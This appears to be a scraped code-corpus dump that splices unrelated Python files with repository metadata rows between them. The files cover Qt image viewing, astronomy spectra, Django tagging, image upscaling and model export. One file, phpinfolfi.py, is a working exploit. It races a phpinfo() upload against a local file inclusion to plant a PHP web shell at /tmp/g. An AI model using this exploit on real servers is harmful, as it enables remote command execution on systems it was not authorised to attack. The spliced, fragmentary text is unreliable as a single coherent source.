if self.zoomMode:
print('zoomMode true, mousePressEvent')
if event.button() == Qt.LeftButton:
if self.canPan:
self.setDragMode(QGraphicsView.ScrollHandDrag)
# self.leftMouseButtonPressed.emit(scenePos.x(), scenePos.y())
elif event.button() == Qt.RightButton:
if self.canZoom:
print('rubberband activated')
self.setDragMode(QGraphicsView.RubberBandDrag)
#self.rightMouseButtonPressed.emit(scenePos.x(), scenePos.y())
QGraphicsView.mousePressEvent(self, event)
if self.drawMode:
print('in drawMode')
if event.button() == Qt.LeftButton:
self.drawing = True
self.lastPoint = self.mapToScene(event.pos())
#print(self.lastPoint)
def mouseReleaseEvent(self, event):
""" Stop mouse pan or zoom mode (apply zoom if valid).
"""
if self.zoomMode:
QGraphicsView.mouseReleaseEvent(self, event)
#scenePos = self.mapToScene(event.pos())
if event.button() == Qt.LeftButton:
self.setDragMode(QGraphicsView.NoDrag)
# self.leftMouseButtonReleased.emit(scenePos.x(), scenePos.y())
elif event.button() == Qt.RightButton:
if self.zoomMode:
if self.canZoom:
viewBBox = self.zoomStack[-1] if len(self.zoomStack) else self.sceneRect()
selectionBBox = self.scene.selectionArea().boundingRect().intersected(viewBBox)
self.scene.setSelectionArea(QPainterPath()) # Clear current selection area.
if selectionBBox.isValid() and (selectionBBox != viewBBox):
self.zoomStack.append(selectionBBox)
self.updateViewer()
self.setDragMode(QGraphicsView.NoDrag)
# self.rightMouseButtonReleased.emit(scenePos.x(), scenePos.y())
if self.drawMode:
if event.button() == Qt.LeftButton:
self.drawing = False
elif event.button() == Qt.RightButton:
pass
def mouseDoubleClickEvent(self, event):
""" Show entire image.
"""
#scenePos = self.mapToScene(event.pos())
if self.zoomMode:
if event.button() == Qt.LeftButton:
# self.leftMouseButtonDoubleClicked.emit(scenePos.x(), scenePos.y())
pass
elif event.button() == Qt.RightButton:
if self.canZoom:
self.zoomStack = [] # Clear zoom stack.
self.updateViewer()
# self.rightMouseButtonDoubleClicked.emit(scenePos.x(), scenePos.y())
QGraphicsView.mouseDoubleClickEvent(self, event)
if __name__ == '__main__':
import sys
try:
from PyQt5.QtWidgets import QApplication
except ImportError:
try:
from PyQt4.QtGui import QApplication
except ImportError:
raise ImportError("QtImageViewer: Requires PyQt5 or PyQt4.")
print('Using Qt ' + QT_VERSION_STR)
def handleLeftClick(x, y):
row = int(y)
column = int(x)
print("Clicked on image pixel (row="+str(row)+", column="+str(column)+")")
# Create the application.
app = QApplication(sys.argv)
# Create image viewer and load an image file to display.
scene = QGraphicsScene()
viewer = QtImageViewer(scene)
viewer.loadImageFromFile() # Pops up file dialog.
# Handle left mouse clicks with custom slot.
# viewer.leftMouseButtonPressed.connect(handleLeftClick)
# Show viewer and run application.
viewer.show()
sys.exit(app.exec_()) | 41.351648 | 120 | 0.618921 |
71d693f61b624df5fe568391e0c680d9c46b0192 | 1,778 | py | Python | wisps/simulations/combine_templates.py | caganze/wisps | 6572201f94a6af6d1c0a306f2f447215d4330bd7 | [
"MIT"
] | null | null | null | wisps/simulations/combine_templates.py | caganze/wisps | 6572201f94a6af6d1c0a306f2f447215d4330bd7 | [
"MIT"
] | 7 | 2021-02-02T21:51:56.000Z | 2022-01-13T00:57:45.000Z | wisps/simulations/combine_templates.py | caganze/wisps | 6572201f94a6af6d1c0a306f2f447215d4330bd7 | [
"MIT"
] | null | null | null | ##purpose: combines object spectral type and then reclassify them
##scaled to their absolute magnitudes
import splat
import wisps
import pandas as pd
import numpy as np
from itertools import combinations
from tqdm import tqdm
import splat.empirical as spe
from concurrent.futures import ThreadPoolExecutor, wait , ALL_COMPLETED
from functools import partial
def proper_classification(sp):
"""
Uses splat.classifyByStandard to classify spectra using spex standards
"""
val=wisps.classify(sp, stripunits=True)
return val
def combine_two_spectra(sp10, sp20):
"""
sp1 and sp2 are splat objects
"""
sp1=sp10.splat_spectrum
sp2=sp20.splat_spectrum
absj0=(wisps.absolute_magnitude_jh(wisps.make_spt_number(sp10.spectral_type[0]))[1]).flatten()[0]
absj1=(wisps.absolute_magnitude_jh(wisps.make_spt_number(sp20.spectral_type[0]))[1]).flatten()[0]
try:
sp1.fluxCalibrate('2MASS H', absj0)
sp2.fluxCalibrate('2MASS H', absj1)
sp3=sp1+sp2
return {'primary': [sp10.spectral_type, sp20.spectral_type],
'system': proper_classification(sp3),
'spectrum': sp3}
except:
return {}
def make_binaries():
##
tpls=pd.read_pickle(wisps.OUTPUT_FILES+'/binary_spex.pkl')
templates=tpls.spectra
iterables=list(np.array([(x, y) for x, y in tqdm(combinations(templates, 2))]).T)
method=partial(combine_two_spectra)
with ThreadPoolExecutor(max_workers=100) as executor:
futures=list(executor.map( method, *iterables, timeout=None, chunksize=10))
results=[x for x in futures]
df=pd.DataFrame.from_records(results)
df.to_pickle(wisps.OUTPUT_FILES+'/binary_templates.pkl')
if __name__=='__main__':
make_binaries() | 26.939394 | 101 | 0.705849 |
ad5a43a70eccb7bd46919eeba3e3e27f5ba35ac1 | 1,083 | py | Python | pyvisdk/do/vim_esx_cl_iiscsiadapterauthchapget_adapter_chap_auth.py | Infinidat/pyvisdk | f2f4e5f50da16f659ccc1d84b6a00f397fa997f8 | [
"MIT"
] | null | null | null | pyvisdk/do/vim_esx_cl_iiscsiadapterauthchapget_adapter_chap_auth.py | Infinidat/pyvisdk | f2f4e5f50da16f659ccc1d84b6a00f397fa997f8 | [
"MIT"
] | null | null | null | pyvisdk/do/vim_esx_cl_iiscsiadapterauthchapget_adapter_chap_auth.py | Infinidat/pyvisdk | f2f4e5f50da16f659ccc1d84b6a00f397fa997f8 | [
"MIT"
] | null | null | null |
import logging
from pyvisdk.exceptions import InvalidArgumentError
# This module is NOT auto-generated
# Inspired by decompiled Java classes from vCenter's internalvim25stubs.jar
# Unless states otherside, the methods and attributes were not used by esxcli,
# and thus not tested
log = logging.getLogger(__name__)
def VimEsxCLIiscsiadapterauthchapgetAdapterChapAuth(vim, *args, **kwargs):
obj = vim.client.factory.create('{urn:vim25}VimEsxCLIiscsiadapterauthchapgetAdapterChapAuth')
# do some validation checking...
if (len(args) + len(kwargs)) < 0:
raise IndexError('Expected at least 1 arguments got: %d' % len(args))
required = [ ]
optional = [ 'Adapter', 'Direction', 'Level', 'Name' ]
for name, arg in zip(required + optional, args):
setattr(obj, name, arg)
for name, value in kwargs.items():
if name in required + optional:
setattr(obj, name, value)
else:
raise InvalidArgumentError("Invalid argument: %s. Expected one of %s" % (name, ", ".join(required + optional)))
return obj | 34.935484 | 124 | 0.690674 |
909ad63681f0a3344e401120bec3de6a3e879d5e | 1,914 | py | Python | reveries/scripts/deadline_extract.py | davidlatwe/reveries-config | 4a282dd64a32a9b87bd1a070759b6425ff785d68 | [
"MIT"
] | 3 | 2020-04-01T10:51:17.000Z | 2021-08-05T18:35:23.000Z | reveries/scripts/deadline_extract.py | davidlatwe/reveries-config | 4a282dd64a32a9b87bd1a070759b6425ff785d68 | [
"MIT"
] | null | null | null | reveries/scripts/deadline_extract.py | davidlatwe/reveries-config | 4a282dd64a32a9b87bd1a070759b6425ff785d68 | [
"MIT"
] | 1 | 2020-07-05T12:06:30.000Z | 2020-07-05T12:06:30.000Z |
import os
import sys
import logging
import json
import pyblish.api
import pyblish.lib
def get_plugin(classname):
# Find extractor plugin
Plugin = None
for P in pyblish.api.discover():
if P.__name__ == classname:
Plugin = P
break
assert Plugin, "Pyblish plugin not found."
return Plugin
def deadline_extract():
dumps = os.environ["PYBLISH_EXTRACTOR_DUMPS"].split(";")
for path in dumps:
with open(path, "r") as file:
data = json.load(file)
args = data["args"]
kwargs = data["kwargs"]
classname = data["class"]
function = data["func"]
Plugin = get_plugin(classname)
yield Plugin # For debug/error message
# Export
plugin = Plugin()
if (classname == "ExtractArnoldStandIn"
and "maya" in Plugin.hosts):
# Set frame range from Deadline task (Maya Only)
from maya import mel
start = int(mel.eval("DeadlineValue(\"StartFrame\")"))
end = int(mel.eval("DeadlineValue(\"EndFrame\")"))
kwargs["start"] = start
kwargs["end"] = end
extractor = getattr(plugin, function)
extractor(*args, **kwargs)
if __name__ == "__main__":
log = logging.getLogger("Pyblish")
Plugin = None
try:
for Plugin in deadline_extract():
pass
except Exception as error:
if Plugin is None:
pyblish.lib.extract_traceback(error)
message = "Failed: {e} -- {e.traceback}"
else:
pyblish.lib.extract_traceback(error, Plugin.__module__)
message = "Failed {p.__name__}: {e} -- {e.traceback}"
log.error(message.format(p=Plugin, e=error))
log.error("Fatal Error: Errors occurred during extract, see log..")
sys.exit(2)
else:
print("All good. Success!")
| 25.52 | 75 | 0.577325 |
50b430207f97745d4db9a4df6556019facd73fad | 966 | py | Python | Invisibility Cloak/Cloak.py | Achyut-Saxena/OpenCV-Projects | d1c9bee943c62fa563555a6b4eb13926b81461d6 | [
"MIT"
] | null | null | null | Invisibility Cloak/Cloak.py | Achyut-Saxena/OpenCV-Projects | d1c9bee943c62fa563555a6b4eb13926b81461d6 | [
"MIT"
] | 1 | 2021-07-16T04:16:21.000Z | 2021-07-16T04:16:51.000Z | Invisibility Cloak/Cloak.py | Achyut-Saxena/OpenCV-Projects | d1c9bee943c62fa563555a6b4eb13926b81461d6 | [
"MIT"
] | null | null | null | import time
import cv2
import numpy as np
cap = cv2.VideoCapture(0, cv2.CAP_DSHOW)
print("Invisibility cloak starts working in:", end="")
for i in range(5):
print(i+1, end=" ")
time.sleep(i)
background = 0
for _ in range(30):
ret, background = cap.read()
background = np.flip(background, axis=1)
while True:
ret, img = cap.read()
img = np.flip(img, axis=1)
hsv = cv2.cvtColor(img, cv2.COLOR_BGR2HSV)
green_low_lim = np.array([25, 52, 72])
green_up_lim = np.array([102, 255, 255])
mask1 = cv2.inRange(hsv, green_low_lim, green_up_lim)
mask2 = cv2.inRange(hsv, green_low_lim, green_up_lim)
mask = mask1+mask2
mask2 = cv2.bitwise_not(mask1)
res1 = cv2.bitwise_and(img, img, mask=mask2)
res2 = cv2.bitwise_and(background, background, mask=mask1)
final_output = res1+res2
cv2.imshow("Cloak", final_output)
k = cv2.waitKey(1) & 0xFF
if k == 27:
break
cv2.destroyAllWindows()
cap.release()
| 27.6 | 62 | 0.666667 |
def4292d1ddcccdc68b5a09926601aa090feff4c | 5,308 | py | Python | taggit/models.py | makaimc/pfisdi | 45e897b374d50e2f5385f15cbf318da0e17900f7 | [
"MIT"
] | 2 | 2015-01-05T21:09:24.000Z | 2015-07-31T16:52:38.000Z | taggit/models.py | makaimc/pfisdi | 45e897b374d50e2f5385f15cbf318da0e17900f7 | [
"MIT"
] | null | null | null | taggit/models.py | makaimc/pfisdi | 45e897b374d50e2f5385f15cbf318da0e17900f7 | [
"MIT"
] | null | null | null | import django
from django.contrib.contenttypes.models import ContentType
from django.contrib.contenttypes.generic import GenericForeignKey
from django.db import models, IntegrityError, transaction
from django.template.defaultfilters import slugify as default_slugify
from django.utils.translation import ugettext_lazy as _, ugettext
from django.contrib.auth.models import User
class TagBase(models.Model):
name = models.CharField(verbose_name=_('Name'), max_length=150)
slug = models.SlugField(verbose_name=_('Slug'), unique=True, max_length=100)
def __unicode__(self):
return self.name
class Meta:
abstract = True
def save(self, *args, **kwargs):
if not self.pk and not self.slug:
self.slug = self.slugify(self.name)
if django.VERSION >= (1, 2):
from django.db import router
using = kwargs.get("using") or router.db_for_write(
type(self), instance=self)
# Make sure we write to the same db for all attempted writes,
# with a multi-master setup, theoretically we could try to
# write and rollback on different DBs
kwargs["using"] = using
trans_kwargs = {"using": using}
else:
trans_kwargs = {}
i = 0
while True:
i += 1
try:
sid = transaction.savepoint(**trans_kwargs)
res = super(TagBase, self).save(*args, **kwargs)
transaction.savepoint_commit(sid, **trans_kwargs)
return res
except IntegrityError:
transaction.savepoint_rollback(sid, **trans_kwargs)
self.slug = self.slugify(self.name, i)
else:
return super(TagBase, self).save(*args, **kwargs)
def slugify(self, tag, i=None):
slug = default_slugify(tag)
if i is not None:
slug += "_%d" % i
return slug
class Tag(TagBase):
class Meta:
verbose_name = _("Tag")
verbose_name_plural = _("Tags")
class ItemBase(models.Model):
def __unicode__(self):
return ugettext("%(object)s tagged with %(tag)s") % {
"object": self.content_object,
"tag": self.tag
}
class Meta:
abstract = True
@classmethod
def tag_model(cls):
return cls._meta.get_field_by_name("tag")[0].rel.to
@classmethod
def tag_relname(cls):
return cls._meta.get_field_by_name('tag')[0].rel.related_name
@classmethod
def lookup_kwargs(cls, instance):
return {
'content_object': instance
}
@classmethod
def bulk_lookup_kwargs(cls, instances):
return {
"content_object__in": instances,
}
class TaggedItemBase(ItemBase):
if django.VERSION < (1, 2):
tag = models.ForeignKey(Tag, related_name="%(class)s_items")
else:
tag = models.ForeignKey(Tag, related_name="%(app_label)s_%(class)s_items")
class Meta:
abstract = True
@classmethod
def tags_for(cls, model, instance=None):
if instance is not None:
return cls.tag_model().objects.filter(**{
'%s__content_object' % cls.tag_relname(): instance
})
return cls.tag_model().objects.filter(**{
'%s__content_object__isnull' % cls.tag_relname(): False
}).distinct()
class GenericTaggedItemBase(ItemBase):
object_id = models.IntegerField(verbose_name=_('Object id'), db_index=True)
tag_creator = models.ForeignKey(User, null=True,
related_name='%(app_label)s_%(class)s_related')
create_timestamp = models.DateTimeField(auto_now=True)
if django.VERSION < (1, 2):
content_type = models.ForeignKey(
ContentType,
verbose_name=_('Content type'),
related_name="%(class)s_tagged_items",
)
else:
content_type = models.ForeignKey(
ContentType,
verbose_name=_('Content type'),
related_name="%(app_label)s_%(class)s_tagged_items",
)
content_object = GenericForeignKey()
class Meta:
abstract=True
@classmethod
def lookup_kwargs(cls, instance):
return {
'object_id': instance.pk,
'content_type': ContentType.objects.get_for_model(instance)
}
@classmethod
def bulk_lookup_kwargs(cls, instances):
# TODO: instances[0], can we assume there are instances.
return {
"object_id__in": [instance.pk for instance in instances],
"content_type": ContentType.objects.get_for_model(instances[0]),
}
@classmethod
def tags_for(cls, model, instance=None):
ct = ContentType.objects.get_for_model(model)
kwargs = {
"%s__content_type" % cls.tag_relname(): ct
}
if instance is not None:
kwargs["%s__object_id" % cls.tag_relname()] = instance.pk
return cls.tag_model().objects.filter(**kwargs).distinct()
class TaggedItem(GenericTaggedItemBase, TaggedItemBase):
class Meta:
verbose_name = _("Tagged Item")
verbose_name_plural = _("Tagged Items")
| 31.784431 | 82 | 0.602675 |
e6a28163993f523934acac87efaaa3a72c0c3c24 | 6,444 | py | Python | inference_realesrgan.py | Gyudori/Real-ESRGAN | 388a477da5c2864faaba6680e926ddf16bc122eb | [
"BSD-3-Clause"
] | null | null | null | inference_realesrgan.py | Gyudori/Real-ESRGAN | 388a477da5c2864faaba6680e926ddf16bc122eb | [
"BSD-3-Clause"
] | null | null | null | inference_realesrgan.py | Gyudori/Real-ESRGAN | 388a477da5c2864faaba6680e926ddf16bc122eb | [
"BSD-3-Clause"
] | null | null | null | import argparse
import cv2
import glob
import os
import time
from basicsr.archs.rrdbnet_arch import RRDBNet
from realesrgan import RealESRGANer
from realesrgan.archs.srvgg_arch import SRVGGNetCompact
def print_elapsed_time(print_messeage, start_time):
end_time = time.time()
hours, rem = divmod(end_time-start_time, 3600)
minutes, seconds = divmod(rem, 60)
print(print_messeage, "| elapsed time:{:0>2}:{:0>2}:{:05.2f}".format(int(hours),int(minutes),seconds))
def main():
"""Inference demo for Real-ESRGAN.
"""
parser = argparse.ArgumentParser()
parser.add_argument('-i', '--input', type=str, default='inputs', help='Input image or folder')
parser.add_argument(
'-n',
'--model_name',
type=str,
default='RealESRGAN_x4plus',
help=('Model names: RealESRGAN_x4plus | RealESRNet_x4plus | RealESRGAN_x4plus_anime_6B | RealESRGAN_x2plus'
'RealESRGANv2-anime-xsx2 | RealESRGANv2-animevideo-xsx2-nousm | RealESRGANv2-animevideo-xsx2'
'RealESRGANv2-anime-xsx4 | RealESRGANv2-animevideo-xsx4-nousm | RealESRGANv2-animevideo-xsx4'))
parser.add_argument('-o', '--output', type=str, default='results', help='Output folder')
parser.add_argument('-s', '--outscale', type=float, default=4, help='The final upsampling scale of the image')
parser.add_argument('--suffix', type=str, default='out', help='Suffix of the restored image')
parser.add_argument('-t', '--tile', type=int, default=0, help='Tile size, 0 for no tile during testing')
parser.add_argument('--tile_pad', type=int, default=10, help='Tile padding')
parser.add_argument('--pre_pad', type=int, default=0, help='Pre padding size at each border')
parser.add_argument('--half', action='store_true', help='Use half precision during inference')
parser.add_argument(
'--alpha_upsampler',
type=str,
default='realesrgan',
help='The upsampler for the alpha channels. Options: realesrgan | bicubic')
parser.add_argument(
'--ext',
type=str,
default='auto',
help='Image extension. Options: auto | jpg | png, auto means using the same extension as inputs')
parser.add_argument('--usecpu', action='store_true', help='True for use cpu in process')
args = parser.parse_args()
# determine models according to model names
args.model_name = args.model_name.split('.')[0]
if args.model_name in ['RealESRGAN_x4plus', 'RealESRNet_x4plus']: # x4 RRDBNet model
model = RRDBNet(num_in_ch=3, num_out_ch=3, num_feat=64, num_block=23, num_grow_ch=32, scale=4)
netscale = 4
elif args.model_name in ['RealESRGAN_x4plus_anime_6B']: # x4 RRDBNet model with 6 blocks
model = RRDBNet(num_in_ch=3, num_out_ch=3, num_feat=64, num_block=6, num_grow_ch=32, scale=4)
netscale = 4
elif args.model_name in ['RealESRGAN_x2plus', 'net_g_2x_200k']: # x2 RRDBNet model
model = RRDBNet(num_in_ch=3, num_out_ch=3, num_feat=64, num_block=23, num_grow_ch=32, scale=2)
netscale = 2
elif args.model_name in [
'RealESRGANv2-anime-xsx2', 'RealESRGANv2-animevideo-xsx2-nousm', 'RealESRGANv2-animevideo-xsx2'
]: # x2 VGG-style model (XS size)
model = SRVGGNetCompact(num_in_ch=3, num_out_ch=3, num_feat=64, num_conv=16, upscale=2, act_type='prelu')
netscale = 2
elif args.model_name in [
'RealESRGANv2-anime-xsx4', 'RealESRGANv2-animevideo-xsx4-nousm', 'RealESRGANv2-animevideo-xsx4'
]: # x4 VGG-style model (XS size)
model = SRVGGNetCompact(num_in_ch=3, num_out_ch=3, num_feat=64, num_conv=16, upscale=4, act_type='prelu')
netscale = 4
else:
print('Using custom pretrained model')
model_arch = args.model_name.split('_')
if model_arch[2] == '1x':
scale = 1
netscale = 1
elif model_arch[2] == '2x':
scale = 1
netscale = 1
else:
print('Invalid custom pretrained model')
if model_arch[4] == '6B':
num_block = 6
elif model_arch[4] == '23B':
num_block = 23
else:
print('Invalid custom pretrained model')
model = RRDBNet(num_in_ch=3, num_out_ch=3, num_feat=64, num_block=num_block, num_grow_ch=32, scale=scale)
# determine model paths
model_path = os.path.join('experiments/pretrained_models', args.model_name + '.pth')
if not os.path.isfile(model_path):
model_path = os.path.join('realesrgan/weights', args.model_name + '.pth')
if not os.path.isfile(model_path):
raise ValueError(f'Model {args.model_name} does not exist.')
# restorer
upsampler = RealESRGANer(
scale=netscale,
model_path=model_path,
model=model,
tile=args.tile,
tile_pad=args.tile_pad,
pre_pad=args.pre_pad,
half=args.half,
usecpu=args.usecpu)
os.makedirs(args.output, exist_ok=True)
if os.path.isfile(args.input):
paths = [args.input]
else:
paths = sorted(glob.glob(os.path.join(args.input, '*')))
total_start = time.time()
print("Start time measure-------------------------------------------")
img_count = 0
for idx, path in enumerate(paths):
img_count += 1
imgname, extension = os.path.splitext(os.path.basename(path))
print('Testing', idx, imgname)
img = cv2.imread(path, cv2.IMREAD_UNCHANGED)
if len(img.shape) == 3 and img.shape[2] == 4:
img_mode = 'RGBA'
else:
img_mode = None
try:
one_img_start = time.time()
output, _ = upsampler.enhance(img, outscale=args.outscale)
print_elapsed_time('Done one image', one_img_start)
except RuntimeError as error:
print('Error', error)
print('If you encounter CUDA out of memory, try to set --tile with a smaller number.')
else:
if args.ext == 'auto':
extension = extension[1:]
else:
extension = args.ext
if img_mode == 'RGBA': # RGBA images should be saved in png format
extension = 'png'
save_path = os.path.join(args.output, f'{imgname}{args.suffix}.{extension}')
cv2.imwrite(save_path, output)
print_elapsed_time('Done all image', total_start)
if __name__ == '__main__':
main()
| 42.675497 | 115 | 0.63563 |
6c902d5fb8e7725b81d9433a9cc0afe42f4ab855 | 3,230 | py | Python | PaddleNLP/dialogue_system/auto_dialogue_evaluation/inference_model.py | lishiyu93/models | 5a41865d3b2a597ba703f0c57c8520f79ff74656 | [
"Apache-2.0"
] | 1 | 2020-05-19T01:24:17.000Z | 2020-05-19T01:24:17.000Z | PaddleNLP/dialogue_system/auto_dialogue_evaluation/inference_model.py | lishiyu93/models | 5a41865d3b2a597ba703f0c57c8520f79ff74656 | [
"Apache-2.0"
] | null | null | null | PaddleNLP/dialogue_system/auto_dialogue_evaluation/inference_model.py | lishiyu93/models | 5a41865d3b2a597ba703f0c57c8520f79ff74656 | [
"Apache-2.0"
] | 1 | 2018-06-27T10:14:19.000Z | 2018-06-27T10:14:19.000Z | # Copyright (c) 2019 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""save inference model for auto dialogue evaluation"""
import os
import sys
import six
import numpy as np
import time
import paddle
import paddle.fluid as fluid
import ade.reader as reader
from ade_net import create_net
from ade.utils.configure import PDConfig
from ade.utils.input_field import InputField
from ade.utils.model_check import check_cuda
def do_save_inference_model(args):
test_prog = fluid.default_main_program()
startup_prog = fluid.default_startup_program()
with fluid.program_guard(test_prog, startup_prog):
test_prog.random_seed = args.random_seed
startup_prog.random_seed = args.random_seed
with fluid.unique_name.guard():
context_wordseq = fluid.data(
name='context_wordseq',
shape=[-1, 1],
dtype='int64',
lod_level=1)
response_wordseq = fluid.data(
name='response_wordseq',
shape=[-1, 1],
dtype='int64',
lod_level=1)
labels = fluid.data(name='labels', shape=[-1, 1], dtype='int64')
input_inst = [context_wordseq, response_wordseq, labels]
input_field = InputField(input_inst)
data_reader = fluid.io.DataLoader.from_generator(
feed_list=input_inst, capacity=4, iterable=False)
logits = create_net(
is_training=False, model_input=input_field, args=args)
if args.use_cuda:
place = fluid.CUDAPlace(0)
else:
place = fluid.CPUPlace()
exe = fluid.Executor(place)
exe.run(startup_prog)
assert (args.init_from_params) or (args.init_from_pretrain_model)
if args.init_from_params:
fluid.load(test_prog, args.init_from_params)
elif args.init_from_pretrain_model:
fluid.load(test_prog, args.init_from_pretrain_model)
# saving inference model
fluid.io.save_inference_model(
args.inference_model_dir,
feeded_var_names=[
input_field.context_wordseq.name,
input_field.response_wordseq.name,
],
target_vars=[logits, ],
executor=exe,
main_program=test_prog,
model_filename="model.pdmodel",
params_filename="params.pdparams")
print("save inference model at %s" % (args.inference_model_dir))
if __name__ == "__main__":
args = PDConfig(yaml_file="./data/config/ade.yaml")
args.build()
check_cuda(args.use_cuda)
do_save_inference_model(args)
| 31.980198 | 165 | 0.654489 |
c369232fa4a8ce765945f77d5e581c0d73a345ea | 5,255 | py | Python | File Inclusion/phpinfolfi.py | hartoyob/PayloadsAllTheThings | 12ee5277636612865a12dbbb83175f157e1423f1 | [
"MIT"
] | 38,247 | 2016-11-22T14:35:27.000Z | 2022-03-31T21:17:44.000Z | File Inclusion/phpinfolfi.py | victorbonato/PayloadsAllTheThings | 210a2b308158e810b6b152e145947e0bd2a81f94 | [
"MIT"
] | 143 | 2017-02-21T06:10:43.000Z | 2022-03-24T21:57:12.000Z | File Inclusion/phpinfolfi.py | victorbonato/PayloadsAllTheThings | 210a2b308158e810b6b152e145947e0bd2a81f94 | [
"MIT"
] | 10,479 | 2017-01-12T14:34:55.000Z | 2022-03-31T23:07:52.000Z | #!/usr/bin/python
# https://www.insomniasec.com/downloads/publications/LFI%20With%20PHPInfo%20Assistance.pdf
# The following line is not required but supposedly optimizes code.
# However, this breaks on some Python 2 installations, where the future module version installed is > 0.16. This can be a pain to revert.
# from builtins import range
from __future__ import print_function
import sys
import threading
import socket
def setup(host, port):
TAG="Security Test"
PAYLOAD="""%s\r
<?php $c=fopen('/tmp/g','w');fwrite($c,'<?php passthru($_GET["f"]);?>');?>\r""" % TAG
REQ1_DATA="""-----------------------------7dbff1ded0714\r
Content-Disposition: form-data; name="dummyname"; filename="test.txt"\r
Content-Type: text/plain\r
\r
%s
-----------------------------7dbff1ded0714--\r""" % PAYLOAD
padding="A" * 5000
REQ1="""POST /phpinfo.php?a="""+padding+""" HTTP/1.1\r
Cookie: PHPSESSID=q249llvfromc1or39t6tvnun42; othercookie="""+padding+"""\r
HTTP_ACCEPT: """ + padding + """\r
HTTP_USER_AGENT: """+padding+"""\r
HTTP_ACCEPT_LANGUAGE: """+padding+"""\r
HTTP_PRAGMA: """+padding+"""\r
Content-Type: multipart/form-data; boundary=---------------------------7dbff1ded0714\r
Content-Length: %s\r
Host: %s\r
\r
%s""" %(len(REQ1_DATA),host,REQ1_DATA)
#modify this to suit the LFI script
LFIREQ="""GET /lfi.php?load=%s%%00 HTTP/1.1\r
User-Agent: Mozilla/4.0\r
Proxy-Connection: Keep-Alive\r
Host: %s\r
\r
\r
"""
return (REQ1, TAG, LFIREQ)
def phpInfoLFI(host, port, phpinforeq, offset, lfireq, tag):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s2 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
s2.connect((host, port))
s.send(phpinforeq)
d = ""
while len(d) < offset:
d += s.recv(offset)
try:
i = d.index("[tmp_name] =>")
fn = d[i+17:i+31]
except ValueError:
return None
s2.send(lfireq % (fn, host))
d = s2.recv(4096)
s.close()
s2.close()
if d.find(tag) != -1:
return fn
counter=0
class ThreadWorker(threading.Thread):
def __init__(self, e, l, m, *args):
threading.Thread.__init__(self)
self.event = e
self.lock = l
self.maxattempts = m
self.args = args
def run(self):
global counter
while not self.event.is_set():
with self.lock:
if counter >= self.maxattempts:
return
counter+=1
try:
x = phpInfoLFI(*self.args)
if self.event.is_set():
break
if x:
print("\nGot it! Shell created in /tmp/g")
self.event.set()
except socket.error:
return
def getOffset(host, port, phpinforeq):
"""Gets offset of tmp_name in the php output"""
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host,port))
s.send(phpinforeq)
d = ""
while True:
i = s.recv(4096)
d+=i
if i == "":
break
# detect the final chunk
if i.endswith("0\r\n\r\n"):
break
s.close()
i = d.find("[tmp_name] =>")
if i == -1:
raise ValueError("No php tmp_name in phpinfo output")
print("found %s at %i" % (d[i:i+10],i))
# padded up a bit
return i+256
def main():
print("LFI With PHPInfo()")
print("-=" * 30)
if len(sys.argv) < 2:
print("Usage: %s host [port] [threads]" % sys.argv[0])
sys.exit(1)
try:
host = socket.gethostbyname(sys.argv[1])
except socket.error as e:
print("Error with hostname %s: %s" % (sys.argv[1], e))
sys.exit(1)
port=80
try:
port = int(sys.argv[2])
except IndexError:
pass
except ValueError as e:
print("Error with port %d: %s" % (sys.argv[2], e))
sys.exit(1)
poolsz=10
try:
poolsz = int(sys.argv[3])
except IndexError:
pass
except ValueError as e:
print("Error with poolsz %d: %s" % (sys.argv[3], e))
sys.exit(1)
print("Getting initial offset...", end=' ')
reqphp, tag, reqlfi = setup(host, port)
offset = getOffset(host, port, reqphp)
sys.stdout.flush()
maxattempts = 1000
e = threading.Event()
l = threading.Lock()
print("Spawning worker pool (%d)..." % poolsz)
sys.stdout.flush()
tp = []
for i in range(0,poolsz):
tp.append(ThreadWorker(e,l,maxattempts, host, port, reqphp, offset, reqlfi, tag))
for t in tp:
t.start()
try:
while not e.wait(1):
if e.is_set():
break
with l:
sys.stdout.write( "\r% 4d / % 4d" % (counter, maxattempts))
sys.stdout.flush()
if counter >= maxattempts:
break
print()
if e.is_set():
print("Woot! \m/")
else:
print(":(")
except KeyboardInterrupt:
print("\nTelling threads to shutdown...")
e.set()
print("Shuttin' down...")
for t in tp:
t.join()
if __name__=="__main__":
print("Don't forget to modify the LFI URL")
main()
| 26.675127 | 138 | 0.552807 |
b593c64a071b6643abda502a3cab49619e9d1eb5 | 587 | py | Python | ampel/model/time/UnixTimeModel.py | mafn/Ampel-core | 744acbf36f0a2ceae7230ceab1350236c1501b57 | [
"BSD-3-Clause"
] | null | null | null | ampel/model/time/UnixTimeModel.py | mafn/Ampel-core | 744acbf36f0a2ceae7230ceab1350236c1501b57 | [
"BSD-3-Clause"
] | null | null | null | ampel/model/time/UnixTimeModel.py | mafn/Ampel-core | 744acbf36f0a2ceae7230ceab1350236c1501b57 | [
"BSD-3-Clause"
] | null | null | null | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# File: Ampel-core/ampel/model/time/UnixTimeModel.py
# License: BSD-3-Clause
# Author: valery brinnel <firstname.lastname@gmail.com>
# Date: 29.09.2018
# Last Modified Date: 06.06.2020
# Last Modified By: valery brinnel <firstname.lastname@gmail.com>
from typing import Literal
from ampel.base.AmpelBaseModel import AmpelBaseModel
class UnixTimeModel(AmpelBaseModel):
match_type: Literal['unix_time']
value: int
def get_timestamp(self, **kwargs) -> int:
return self.value
| 27.952381 | 68 | 0.674617 |
405dd67a91afef42bacc4e2ed5fae4884210c3c9 | 5,824 | py | Python | src/models/circuit.py | flyingbanana1024102/transmission-line-simulator | 101b771702791e29f6a1ce1bbcdac1de2ed82982 | [
"MIT"
] | null | null | null | src/models/circuit.py | flyingbanana1024102/transmission-line-simulator | 101b771702791e29f6a1ce1bbcdac1de2ed82982 | [
"MIT"
] | 4 | 2018-09-02T23:07:28.000Z | 2018-09-12T05:26:59.000Z | src/models/circuit.py | flyingbanana1024102/transmission-line-simulator | 101b771702791e29f6a1ce1bbcdac1de2ed82982 | [
"MIT"
] | null | null | null | #
